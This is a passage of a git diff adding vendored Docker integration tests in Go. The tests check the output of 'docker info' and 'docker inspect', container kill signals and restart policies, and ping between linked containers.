+} + +func (s *DockerSuite) TestInfoDisplaysPausedContainers(c *check.C) { + testRequires(c, IsPausable) + + out, _ := runSleepingContainer(c, "-d") + cleanedContainerID := strings.TrimSpace(out) + + dockerCmd(c, "pause", cleanedContainerID) + + out, _ = dockerCmd(c, "info") + c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", 1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", 0)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", 1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", 0)) +} + +func (s *DockerSuite) 
TestInfoDisplaysStoppedContainers(c *check.C) { + testRequires(c, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + cleanedContainerID := strings.TrimSpace(out) + + dockerCmd(c, "stop", cleanedContainerID) + + out, _ = dockerCmd(c, "info") + c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", 1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", 0)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", 0)) + c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", 1)) +} + +func (s *DockerSuite) TestInfoDebug(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + d := NewDaemon(c) + err := d.Start("--debug") + c.Assert(err, checker.IsNil) + defer d.Stop() + + out, err := d.Cmd("--debug", "info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Debug Mode (client): true\n") + c.Assert(out, checker.Contains, "Debug Mode (server): true\n") + c.Assert(out, checker.Contains, "File Descriptors") + c.Assert(out, checker.Contains, "Goroutines") + c.Assert(out, checker.Contains, "System Time") + c.Assert(out, checker.Contains, "EventsListeners") + c.Assert(out, checker.Contains, "Docker Root Dir") +} + +func (s *DockerSuite) TestInsecureRegistries(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + registryCIDR := "192.168.1.0/24" + registryHost := "insecurehost.com:5000" + + d := NewDaemon(c) + err := d.Start("--insecure-registry="+registryCIDR, "--insecure-registry="+registryHost) + c.Assert(err, checker.IsNil) + defer d.Stop() + + out, err := d.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Insecure Registries:\n") + c.Assert(out, checker.Contains, fmt.Sprintf(" %s\n", registryHost)) + c.Assert(out, checker.Contains, fmt.Sprintf(" %s\n", registryCIDR)) +} + +func (s *DockerDaemonSuite) TestRegistryMirrors(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + registryMirror1 := "https://192.168.1.2" + registryMirror2 := 
"http://registry.mirror.com:5000" + + err := s.d.Start("--registry-mirror="+registryMirror1, "--registry-mirror="+registryMirror2) + c.Assert(err, checker.IsNil) + + out, err := s.d.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Registry Mirrors:\n") + c.Assert(out, checker.Contains, fmt.Sprintf(" %s", registryMirror1)) + c.Assert(out, checker.Contains, fmt.Sprintf(" %s", registryMirror2)) +} + +// Test case for #24392 +func (s *DockerDaemonSuite) TestInfoLabels(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + err := s.d.Start("--label", `test.empty=`, "--label", `test.empty=`, "--label", `test.label="1"`, "--label", `test.label="2"`) + c.Assert(err, checker.IsNil) + + out, err := s.d.Cmd("info") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "WARNING: labels with duplicate keys and conflicting values have been deprecated") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go new file mode 100644 index 0000000000..b9323060dd --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go @@ -0,0 +1,15 @@ +// +build !windows + +package main + +import ( + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestInfoSecurityOptions(c *check.C) { + testRequires(c, SameHostDaemon, seccompEnabled, Apparmor, DaemonIsLinux) + + out, _ := dockerCmd(c, "info") + c.Assert(out, checker.Contains, "Security Options:\n apparmor\n seccomp\n Profile: default\n") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go new file mode 100644 index 0000000000..32ed28afe1 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go @@ -0,0 +1,466 @@ +package main + +import ( 
+ "encoding/json" + "fmt" + "os" + "os/exec" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func checkValidGraphDriver(c *check.C, name string) { + if name != "devicemapper" && name != "overlay" && name != "vfs" && name != "zfs" && name != "btrfs" && name != "aufs" { + c.Fatalf("%v is not a valid graph driver name", name) + } +} + +func (s *DockerSuite) TestInspectImage(c *check.C) { + testRequires(c, DaemonIsLinux) + imageTest := "emptyfs" + // It is important that this ID remain stable. If a code change causes + // it to be different, this is equivalent to a cache bust when pulling + // a legacy-format manifest. If the check at the end of this function + // fails, fix the difference in the image serialization instead of + // updating this hash. + imageTestID := "sha256:11f64303f0f7ffdc71f001788132bca5346831939a956e3e975c93267d89a16d" + id := inspectField(c, imageTest, "Id") + + c.Assert(id, checker.Equals, imageTestID) +} + +func (s *DockerSuite) TestInspectInt64(c *check.C) { + dockerCmd(c, "run", "-d", "-m=300M", "--name", "inspectTest", "busybox", "true") + inspectOut := inspectField(c, "inspectTest", "HostConfig.Memory") + c.Assert(inspectOut, checker.Equals, "314572800") +} + +func (s *DockerSuite) TestInspectDefault(c *check.C) { + //Both the container and image are named busybox. docker inspect will fetch the container JSON. + //If the container JSON is not available, it will go for the image JSON. 
+ + out, _ := dockerCmd(c, "run", "--name=busybox", "-d", "busybox", "true") + containerID := strings.TrimSpace(out) + + inspectOut := inspectField(c, "busybox", "Id") + c.Assert(strings.TrimSpace(inspectOut), checker.Equals, containerID) +} + +func (s *DockerSuite) TestInspectStatus(c *check.C) { + if daemonPlatform != "windows" { + defer unpauseAllContainers() + } + out, _ := runSleepingContainer(c, "-d") + out = strings.TrimSpace(out) + + inspectOut := inspectField(c, out, "State.Status") + c.Assert(inspectOut, checker.Equals, "running") + + // Windows does not support pause/unpause on Windows Server Containers. + // (RS1 does for Hyper-V Containers, but production CI is not setup for that) + if daemonPlatform != "windows" { + dockerCmd(c, "pause", out) + inspectOut = inspectField(c, out, "State.Status") + c.Assert(inspectOut, checker.Equals, "paused") + + dockerCmd(c, "unpause", out) + inspectOut = inspectField(c, out, "State.Status") + c.Assert(inspectOut, checker.Equals, "running") + } + + dockerCmd(c, "stop", out) + inspectOut = inspectField(c, out, "State.Status") + c.Assert(inspectOut, checker.Equals, "exited") + +} + +func (s *DockerSuite) TestInspectTypeFlagContainer(c *check.C) { + //Both the container and image are named busybox. docker inspect will fetch container + //JSON State.Running field. If the field is true, it's a container. + runSleepingContainer(c, "--name=busybox", "-d") + + formatStr := "--format={{.State.Running}}" + out, _ := dockerCmd(c, "inspect", "--type=container", formatStr, "busybox") + c.Assert(out, checker.Equals, "true\n") // not a container JSON +} + +func (s *DockerSuite) TestInspectTypeFlagWithNoContainer(c *check.C) { + //Run this test on an image named busybox. docker inspect will try to fetch container + //JSON. Since there is no container named busybox and --type=container, docker inspect will + //not try to get the image JSON. It will throw an error. 
+ + dockerCmd(c, "run", "-d", "busybox", "true") + + _, _, err := dockerCmdWithError("inspect", "--type=container", "busybox") + // docker inspect should fail, as there is no container named busybox + c.Assert(err, checker.NotNil) +} + +func (s *DockerSuite) TestInspectTypeFlagWithImage(c *check.C) { + //Both the container and image are named busybox. docker inspect will fetch image + //JSON as --type=image. if there is no image with name busybox, docker inspect + //will throw an error. + + dockerCmd(c, "run", "--name=busybox", "-d", "busybox", "true") + + out, _ := dockerCmd(c, "inspect", "--type=image", "busybox") + c.Assert(out, checker.Not(checker.Contains), "State") // not an image JSON +} + +func (s *DockerSuite) TestInspectTypeFlagWithInvalidValue(c *check.C) { + //Both the container and image are named busybox. docker inspect will fail + //as --type=foobar is not a valid value for the flag. + + dockerCmd(c, "run", "--name=busybox", "-d", "busybox", "true") + + out, exitCode, err := dockerCmdWithError("inspect", "--type=foobar", "busybox") + c.Assert(err, checker.NotNil, check.Commentf("%s", exitCode)) + c.Assert(exitCode, checker.Equals, 1, check.Commentf("%s", err)) + c.Assert(out, checker.Contains, "not a valid value for --type") +} + +func (s *DockerSuite) TestInspectImageFilterInt(c *check.C) { + testRequires(c, DaemonIsLinux) + imageTest := "emptyfs" + out := inspectField(c, imageTest, "Size") + + size, err := strconv.Atoi(out) + c.Assert(err, checker.IsNil, check.Commentf("failed to inspect size of the image: %s, %v", out, err)) + + //now see if the size turns out to be the same + formatStr := fmt.Sprintf("--format={{eq .Size %d}}", size) + out, _ = dockerCmd(c, "inspect", formatStr, imageTest) + result, err := strconv.ParseBool(strings.TrimSuffix(out, "\n")) + c.Assert(err, checker.IsNil) + c.Assert(result, checker.Equals, true) +} + +func (s *DockerSuite) TestInspectContainerFilterInt(c *check.C) { + runCmd := exec.Command(dockerBinary, "run", "-i", 
"-a", "stdin", "busybox", "cat") + runCmd.Stdin = strings.NewReader("blahblah") + out, _, _, err := runCommandWithStdoutStderr(runCmd) + c.Assert(err, checker.IsNil, check.Commentf("failed to run container: %v, output: %q", err, out)) + + id := strings.TrimSpace(out) + + out = inspectField(c, id, "State.ExitCode") + + exitCode, err := strconv.Atoi(out) + c.Assert(err, checker.IsNil, check.Commentf("failed to inspect exitcode of the container: %s, %v", out, err)) + + //now get the exit code to verify + formatStr := fmt.Sprintf("--format={{eq .State.ExitCode %d}}", exitCode) + out, _ = dockerCmd(c, "inspect", formatStr, id) + result, err := strconv.ParseBool(strings.TrimSuffix(out, "\n")) + c.Assert(err, checker.IsNil) + c.Assert(result, checker.Equals, true) +} + +func (s *DockerSuite) TestInspectImageGraphDriver(c *check.C) { + testRequires(c, DaemonIsLinux, Devicemapper) + imageTest := "emptyfs" + name := inspectField(c, imageTest, "GraphDriver.Name") + + checkValidGraphDriver(c, name) + + deviceID := inspectField(c, imageTest, "GraphDriver.Data.DeviceId") + + _, err := strconv.Atoi(deviceID) + c.Assert(err, checker.IsNil, check.Commentf("failed to inspect DeviceId of the image: %s, %v", deviceID, err)) + + deviceSize := inspectField(c, imageTest, "GraphDriver.Data.DeviceSize") + + _, err = strconv.ParseUint(deviceSize, 10, 64) + c.Assert(err, checker.IsNil, check.Commentf("failed to inspect DeviceSize of the image: %s, %v", deviceSize, err)) +} + +func (s *DockerSuite) TestInspectContainerGraphDriver(c *check.C) { + testRequires(c, DaemonIsLinux, Devicemapper) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + out = strings.TrimSpace(out) + + name := inspectField(c, out, "GraphDriver.Name") + + checkValidGraphDriver(c, name) + + imageDeviceID := inspectField(c, "busybox", "GraphDriver.Data.DeviceId") + + deviceID := inspectField(c, out, "GraphDriver.Data.DeviceId") + + c.Assert(imageDeviceID, checker.Not(checker.Equals), deviceID) + + _, err := 
strconv.Atoi(deviceID) + c.Assert(err, checker.IsNil, check.Commentf("failed to inspect DeviceId of the image: %s, %v", deviceID, err)) + + deviceSize := inspectField(c, out, "GraphDriver.Data.DeviceSize") + + _, err = strconv.ParseUint(deviceSize, 10, 64) + c.Assert(err, checker.IsNil, check.Commentf("failed to inspect DeviceSize of the image: %s, %v", deviceSize, err)) +} + +func (s *DockerSuite) TestInspectBindMountPoint(c *check.C) { + modifier := ",z" + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + if daemonPlatform == "windows" { + modifier = "" + // TODO Windows: Temporary check - remove once TP5 support is dropped + if windowsDaemonKV < 14350 { + c.Skip("Needs later Windows build for RO volumes") + } + // Linux creates the host directory if it doesn't exist. Windows does not. + os.Mkdir(`c:\data`, os.ModeDir) + } + + dockerCmd(c, "run", "-d", "--name", "test", "-v", prefix+slash+"data:"+prefix+slash+"data:ro"+modifier, "busybox", "cat") + + vol := inspectFieldJSON(c, "test", "Mounts") + + var mp []types.MountPoint + err := json.Unmarshal([]byte(vol), &mp) + c.Assert(err, checker.IsNil) + + // check that there is only one mountpoint + c.Assert(mp, check.HasLen, 1) + + m := mp[0] + + c.Assert(m.Name, checker.Equals, "") + c.Assert(m.Driver, checker.Equals, "") + c.Assert(m.Source, checker.Equals, prefix+slash+"data") + c.Assert(m.Destination, checker.Equals, prefix+slash+"data") + if daemonPlatform != "windows" { // Windows does not set mode + c.Assert(m.Mode, checker.Equals, "ro"+modifier) + } + c.Assert(m.RW, checker.Equals, false) +} + +func (s *DockerSuite) TestInspectNamedMountPoint(c *check.C) { + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + + dockerCmd(c, "run", "-d", "--name", "test", "-v", "data:"+prefix+slash+"data", "busybox", "cat") + + vol := inspectFieldJSON(c, "test", "Mounts") + + var mp []types.MountPoint + err := json.Unmarshal([]byte(vol), &mp) + c.Assert(err, checker.IsNil) + + // check that there is only one 
mountpoint + c.Assert(mp, checker.HasLen, 1) + + m := mp[0] + + c.Assert(m.Name, checker.Equals, "data") + c.Assert(m.Driver, checker.Equals, "local") + c.Assert(m.Source, checker.Not(checker.Equals), "") + c.Assert(m.Destination, checker.Equals, prefix+slash+"data") + c.Assert(m.RW, checker.Equals, true) +} + +// #14947 +func (s *DockerSuite) TestInspectTimesAsRFC3339Nano(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + id := strings.TrimSpace(out) + startedAt := inspectField(c, id, "State.StartedAt") + finishedAt := inspectField(c, id, "State.FinishedAt") + created := inspectField(c, id, "Created") + + _, err := time.Parse(time.RFC3339Nano, startedAt) + c.Assert(err, checker.IsNil) + _, err = time.Parse(time.RFC3339Nano, finishedAt) + c.Assert(err, checker.IsNil) + _, err = time.Parse(time.RFC3339Nano, created) + c.Assert(err, checker.IsNil) + + created = inspectField(c, "busybox", "Created") + + _, err = time.Parse(time.RFC3339Nano, created) + c.Assert(err, checker.IsNil) +} + +// #15633 +func (s *DockerSuite) TestInspectLogConfigNoType(c *check.C) { + dockerCmd(c, "create", "--name=test", "--log-opt", "max-file=42", "busybox") + var logConfig container.LogConfig + + out := inspectFieldJSON(c, "test", "HostConfig.LogConfig") + + err := json.NewDecoder(strings.NewReader(out)).Decode(&logConfig) + c.Assert(err, checker.IsNil, check.Commentf("%v", out)) + + c.Assert(logConfig.Type, checker.Equals, "json-file") + c.Assert(logConfig.Config["max-file"], checker.Equals, "42", check.Commentf("%v", logConfig)) +} + +func (s *DockerSuite) TestInspectNoSizeFlagContainer(c *check.C) { + + //Both the container and image are named busybox. docker inspect will fetch container + //JSON SizeRw and SizeRootFs field. If there is no flag --size/-s, there are no size fields. 
+ + runSleepingContainer(c, "--name=busybox", "-d") + + formatStr := "--format={{.SizeRw}},{{.SizeRootFs}}" + out, _ := dockerCmd(c, "inspect", "--type=container", formatStr, "busybox") + c.Assert(strings.TrimSpace(out), check.Equals, ",", check.Commentf("Exepcted not to display size info: %s", out)) +} + +func (s *DockerSuite) TestInspectSizeFlagContainer(c *check.C) { + runSleepingContainer(c, "--name=busybox", "-d") + + formatStr := "--format='{{.SizeRw}},{{.SizeRootFs}}'" + out, _ := dockerCmd(c, "inspect", "-s", "--type=container", formatStr, "busybox") + sz := strings.Split(out, ",") + + c.Assert(strings.TrimSpace(sz[0]), check.Not(check.Equals), "") + c.Assert(strings.TrimSpace(sz[1]), check.Not(check.Equals), "") +} + +func (s *DockerSuite) TestInspectTemplateError(c *check.C) { + // Template parsing error for both the container and image. + + runSleepingContainer(c, "--name=container1", "-d") + + out, _, err := dockerCmdWithError("inspect", "--type=container", "--format='Format container: {{.ThisDoesNotExist}}'", "container1") + c.Assert(err, check.Not(check.IsNil)) + c.Assert(out, checker.Contains, "Template parsing error") + + out, _, err = dockerCmdWithError("inspect", "--type=image", "--format='Format container: {{.ThisDoesNotExist}}'", "busybox") + c.Assert(err, check.Not(check.IsNil)) + c.Assert(out, checker.Contains, "Template parsing error") +} + +func (s *DockerSuite) TestInspectJSONFields(c *check.C) { + runSleepingContainer(c, "--name=busybox", "-d") + out, _, err := dockerCmdWithError("inspect", "--type=container", "--format={{.HostConfig.Dns}}", "busybox") + + c.Assert(err, check.IsNil) + c.Assert(out, checker.Equals, "[]\n") +} + +func (s *DockerSuite) TestInspectByPrefix(c *check.C) { + id := inspectField(c, "busybox", "Id") + c.Assert(id, checker.HasPrefix, "sha256:") + + id2 := inspectField(c, id[:12], "Id") + c.Assert(id, checker.Equals, id2) + + id3 := inspectField(c, strings.TrimPrefix(id, "sha256:")[:12], "Id") + c.Assert(id, 
checker.Equals, id3) +} + +func (s *DockerSuite) TestInspectStopWhenNotFound(c *check.C) { + runSleepingContainer(c, "--name=busybox", "-d") + runSleepingContainer(c, "--name=not-shown", "-d") + out, _, err := dockerCmdWithError("inspect", "--type=container", "--format='{{.Name}}'", "busybox", "missing", "not-shown") + + c.Assert(err, checker.Not(check.IsNil)) + c.Assert(out, checker.Contains, "busybox") + c.Assert(out, checker.Not(checker.Contains), "not-shown") + c.Assert(out, checker.Contains, "Error: No such container: missing") +} + +func (s *DockerSuite) TestInspectHistory(c *check.C) { + dockerCmd(c, "run", "--name=testcont", "busybox", "echo", "hello") + dockerCmd(c, "commit", "-m", "test comment", "testcont", "testimg") + out, _, err := dockerCmdWithError("inspect", "--format='{{.Comment}}'", "testimg") + c.Assert(err, check.IsNil) + c.Assert(out, checker.Contains, "test comment") +} + +func (s *DockerSuite) TestInspectContainerNetworkDefault(c *check.C) { + testRequires(c, DaemonIsLinux) + + contName := "test1" + dockerCmd(c, "run", "--name", contName, "-d", "busybox", "top") + netOut, _ := dockerCmd(c, "network", "inspect", "--format={{.ID}}", "bridge") + out := inspectField(c, contName, "NetworkSettings.Networks") + c.Assert(out, checker.Contains, "bridge") + out = inspectField(c, contName, "NetworkSettings.Networks.bridge.NetworkID") + c.Assert(strings.TrimSpace(out), checker.Equals, strings.TrimSpace(netOut)) +} + +func (s *DockerSuite) TestInspectContainerNetworkCustom(c *check.C) { + testRequires(c, DaemonIsLinux) + + netOut, _ := dockerCmd(c, "network", "create", "net1") + dockerCmd(c, "run", "--name=container1", "--net=net1", "-d", "busybox", "top") + out := inspectField(c, "container1", "NetworkSettings.Networks") + c.Assert(out, checker.Contains, "net1") + out = inspectField(c, "container1", "NetworkSettings.Networks.net1.NetworkID") + c.Assert(strings.TrimSpace(out), checker.Equals, strings.TrimSpace(netOut)) +} + +func (s *DockerSuite) 
TestInspectRootFS(c *check.C) { + out, _, err := dockerCmdWithError("inspect", "busybox") + c.Assert(err, check.IsNil) + + var imageJSON []types.ImageInspect + err = json.Unmarshal([]byte(out), &imageJSON) + c.Assert(err, checker.IsNil) + + c.Assert(len(imageJSON[0].RootFS.Layers), checker.GreaterOrEqualThan, 1) +} + +func (s *DockerSuite) TestInspectAmpersand(c *check.C) { + testRequires(c, DaemonIsLinux) + + name := "test" + out, _ := dockerCmd(c, "run", "--name", name, "--env", `TEST_ENV="soanni&rtr"`, "busybox", "env") + c.Assert(out, checker.Contains, `soanni&rtr`) + out, _ = dockerCmd(c, "inspect", name) + c.Assert(out, checker.Contains, `soanni&rtr`) +} + +func (s *DockerSuite) TestInspectPlugin(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, Network) + _, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err := dockerCmdWithError("inspect", "--type", "plugin", "--format", "{{.Name}}", pNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, pNameWithTag) + + out, _, err = dockerCmdWithError("inspect", "--format", "{{.Name}}", pNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, pNameWithTag) + + // Even without tag the inspect still work + out, _, err = dockerCmdWithError("inspect", "--type", "plugin", "--format", "{{.Name}}", pNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, pNameWithTag) + + out, _, err = dockerCmdWithError("inspect", "--format", "{{.Name}}", pNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, pNameWithTag) + + _, _, err = dockerCmdWithError("plugin", "disable", pNameWithTag) + c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, pNameWithTag) +} + +// Test case for 
#29185 +func (s *DockerSuite) TestInspectUnknownObject(c *check.C) { + // This test should work on both Windows and Linux + out, _, err := dockerCmdWithError("inspect", "foobar") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "Error: No such object: foobar") + c.Assert(err.Error(), checker.Contains, "Error: No such object: foobar") +} + +func (s *DockerSuite) TestInpectInvalidReference(c *check.C) { + // This test should work on both Windows and Linux + out, _, err := dockerCmdWithError("inspect", "FooBar") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "Error: No such object: FooBar") + c.Assert(err.Error(), checker.Contains, "Error: No such object: FooBar") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go new file mode 100644 index 0000000000..43164801d4 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go @@ -0,0 +1,134 @@ +package main + +import ( + "fmt" + "net/http" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestKillContainer(c *check.C) { + out, _ := runSleepingContainer(c, "-d") + cleanedContainerID := strings.TrimSpace(out) + c.Assert(waitRun(cleanedContainerID), check.IsNil) + + dockerCmd(c, "kill", cleanedContainerID) + c.Assert(waitExited(cleanedContainerID, 10*time.Second), check.IsNil) + + out, _ = dockerCmd(c, "ps", "-q") + c.Assert(out, checker.Not(checker.Contains), cleanedContainerID, check.Commentf("killed container is still running")) + +} + +func (s *DockerSuite) TestKillOffStoppedContainer(c *check.C) { + out, _ := runSleepingContainer(c, "-d") + cleanedContainerID := strings.TrimSpace(out) + + dockerCmd(c, "stop", cleanedContainerID) + c.Assert(waitExited(cleanedContainerID, 10*time.Second), check.IsNil) + + _, _, err := dockerCmdWithError("kill", "-s", "30", 
cleanedContainerID) + c.Assert(err, check.Not(check.IsNil), check.Commentf("Container %s is not running", cleanedContainerID)) +} + +func (s *DockerSuite) TestKillDifferentUserContainer(c *check.C) { + // TODO Windows: Windows does not yet support -u (Feb 2016). + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-u", "daemon", "-d", "busybox", "top") + cleanedContainerID := strings.TrimSpace(out) + c.Assert(waitRun(cleanedContainerID), check.IsNil) + + dockerCmd(c, "kill", cleanedContainerID) + c.Assert(waitExited(cleanedContainerID, 10*time.Second), check.IsNil) + + out, _ = dockerCmd(c, "ps", "-q") + c.Assert(out, checker.Not(checker.Contains), cleanedContainerID, check.Commentf("killed container is still running")) + +} + +// regression test about correct signal parsing see #13665 +func (s *DockerSuite) TestKillWithSignal(c *check.C) { + // Cannot port to Windows - does not support signals in the same way Linux does + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + cid := strings.TrimSpace(out) + c.Assert(waitRun(cid), check.IsNil) + + dockerCmd(c, "kill", "-s", "SIGWINCH", cid) + time.Sleep(250 * time.Millisecond) + + running := inspectField(c, cid, "State.Running") + + c.Assert(running, checker.Equals, "true", check.Commentf("Container should be in running state after SIGWINCH")) +} + +func (s *DockerSuite) TestKillWithStopSignalWithSameSignalShouldDisableRestartPolicy(c *check.C) { + // Cannot port to Windows - does not support signals in the same way as Linux does + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "--stop-signal=TERM", "--restart=always", "busybox", "top") + cid := strings.TrimSpace(out) + c.Assert(waitRun(cid), check.IsNil) + + // Let docker send a TERM signal to the container + // It will kill the process and disable the restart policy + dockerCmd(c, "kill", "-s", "TERM", cid) + c.Assert(waitExited(cid, 10*time.Second), check.IsNil) + + out, _ = dockerCmd(c, "ps", 
"-q") + c.Assert(out, checker.Not(checker.Contains), cid, check.Commentf("killed container is still running")) +} + +func (s *DockerSuite) TestKillWithStopSignalWithDifferentSignalShouldKeepRestartPolicy(c *check.C) { + // Cannot port to Windows - does not support signals in the same way as Linux does + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "--stop-signal=CONT", "--restart=always", "busybox", "top") + cid := strings.TrimSpace(out) + c.Assert(waitRun(cid), check.IsNil) + + // Let docker send a TERM signal to the container + // It will kill the process, but not disable the restart policy + dockerCmd(c, "kill", "-s", "TERM", cid) + c.Assert(waitRestart(cid, 10*time.Second), check.IsNil) + + // Restart policy should still be in place, so it should be still running + c.Assert(waitRun(cid), check.IsNil) +} + +// FIXME(vdemeester) should be a unit test +func (s *DockerSuite) TestKillWithInvalidSignal(c *check.C) { + out, _ := runSleepingContainer(c, "-d") + cid := strings.TrimSpace(out) + c.Assert(waitRun(cid), check.IsNil) + + out, _, err := dockerCmdWithError("kill", "-s", "0", cid) + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, "Invalid signal: 0", check.Commentf("Kill with an invalid signal didn't error out correctly")) + + running := inspectField(c, cid, "State.Running") + c.Assert(running, checker.Equals, "true", check.Commentf("Container should be in running state after an invalid signal")) + + out, _ = runSleepingContainer(c, "-d") + cid = strings.TrimSpace(out) + c.Assert(waitRun(cid), check.IsNil) + + out, _, err = dockerCmdWithError("kill", "-s", "SIG42", cid) + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, "Invalid signal: SIG42", check.Commentf("Kill with an invalid signal error out correctly")) + + running = inspectField(c, cid, "State.Running") + c.Assert(running, checker.Equals, "true", check.Commentf("Container should be in running state after an invalid signal")) + +} + +func (s 
*DockerSuite) TestKillStoppedContainerAPIPre120(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later + runSleepingContainer(c, "--name", "docker-kill-test-api", "-d") + dockerCmd(c, "stop", "docker-kill-test-api") + + status, _, err := sockRequest("POST", fmt.Sprintf("/v1.19/containers/%s/kill", "docker-kill-test-api"), nil) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusNoContent) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go new file mode 100644 index 0000000000..a5872d9e0c --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go @@ -0,0 +1,240 @@ +package main + +import ( + "encoding/json" + "fmt" + "regexp" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/runconfig" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestLinksPingUnlinkedContainers(c *check.C) { + testRequires(c, DaemonIsLinux) + _, exitCode, err := dockerCmdWithError("run", "--rm", "busybox", "sh", "-c", "ping -c 1 alias1 -W 1 && ping -c 1 alias2 -W 1") + + // run ping failed with error + c.Assert(exitCode, checker.Equals, 1, check.Commentf("error: %v", err)) +} + +// Test for appropriate error when calling --link with an invalid target container +func (s *DockerSuite) TestLinksInvalidContainerTarget(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _, err := dockerCmdWithError("run", "--link", "bogus:alias", "busybox", "true") + + // an invalid container target should produce an error + c.Assert(err, checker.NotNil, check.Commentf("out: %s", out)) + // an invalid container target should produce an error + c.Assert(out, checker.Contains, "Could not get container") +} + +func (s *DockerSuite) TestLinksPingLinkedContainers(c *check.C) { + testRequires(c, DaemonIsLinux) + // Test with the three different ways of specifying the 
default network on Linux + testLinkPingOnNetwork(c, "") + testLinkPingOnNetwork(c, "default") + testLinkPingOnNetwork(c, "bridge") +} + +func testLinkPingOnNetwork(c *check.C, network string) { + var postArgs []string + if network != "" { + postArgs = append(postArgs, []string{"--net", network}...) + } + postArgs = append(postArgs, []string{"busybox", "top"}...) + runArgs1 := append([]string{"run", "-d", "--name", "container1", "--hostname", "fred"}, postArgs...) + runArgs2 := append([]string{"run", "-d", "--name", "container2", "--hostname", "wilma"}, postArgs...) + + // Run the two named containers + dockerCmd(c, runArgs1...) + dockerCmd(c, runArgs2...) + + postArgs = []string{} + if network != "" { + postArgs = append(postArgs, []string{"--net", network}...) + } + postArgs = append(postArgs, []string{"busybox", "sh", "-c"}...) + + // Format a run for a container which links to the other two + runArgs := append([]string{"run", "--rm", "--link", "container1:alias1", "--link", "container2:alias2"}, postArgs...) + pingCmd := "ping -c 1 %s -W 1 && ping -c 1 %s -W 1" + + // test ping by alias, ping by name, and ping by hostname + // 1. Ping by alias + dockerCmd(c, append(runArgs, fmt.Sprintf(pingCmd, "alias1", "alias2"))...) + // 2. Ping by container name + dockerCmd(c, append(runArgs, fmt.Sprintf(pingCmd, "container1", "container2"))...) + // 3. Ping by hostname + dockerCmd(c, append(runArgs, fmt.Sprintf(pingCmd, "fred", "wilma"))...) 
